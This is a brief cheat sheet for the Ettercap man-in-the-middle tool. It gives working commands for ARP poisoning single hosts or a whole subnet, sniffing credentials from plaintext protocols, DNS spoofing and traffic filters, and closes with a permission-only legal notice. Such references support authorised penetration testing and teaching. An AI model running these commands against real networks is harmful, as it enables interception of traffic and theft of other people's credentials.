Ettercap Cheat Sheet
Ettercap is a classic man-in-the-middle (MITM) attack tool used for packet sniffing, traffic manipulation, credential harvesting, and protocol analysis on local networks.
Start Ettercap
Text Mode
ettercap -T
Graphical Mode
ettercap -G
List Network Interfaces
ettercap -I
Basic MITM (ARP Poisoning)
ettercap -T -q -i eth0 -M arp:remote /192.168.1.10/ /192.168.1.1/
- -T → text mode
- -q → quiet
- -M arp:remote → ARP poisoning
MITM Entire Subnet
ettercap -T -q -i eth0 -M arp:remote /192.168.1.0/24/ /192.168.1.1/
Sniff Credentials
ettercap -T -i eth0
Automatically parses many protocols:
- HTTP
- FTP
- Telnet
- POP3
Use Plugins
List plugins:
ettercap -P list
Run plugin:
ettercap -T -P dns_spoof -i eth0
DNS Spoofing
ettercap -T -q -i eth0 -P dns_spoof
Edit hosts file:
/ettercap/etter.dns
Filters
Compile filter:
etterfilter filter.ecf -o filter.ef
Run filter:
ettercap -T -q -F filter.ef -i eth0
Typical Workflow
ettercap -T -i eth0
Select sniffing → Unified sniffing
Enable ARP poisoning
Activate plugins
Stop Attack
Press:
q
Restore network:
service network-manager restart
Common Issues
No traffic captured
- IP forwarding disabled
- Wrong interface selected
Targets lose connectivity
- ARP poisoning misconfigured
Related Tools
- bettercap
- dsniff
- wireshark
- tcpdump
Use Cases
- MITM attacks
- Credential harvesting
- Network traffic analysis
- Red team operations
Legal Notice
Danger
Use Ettercap only on networks you own or have explicit permission to test.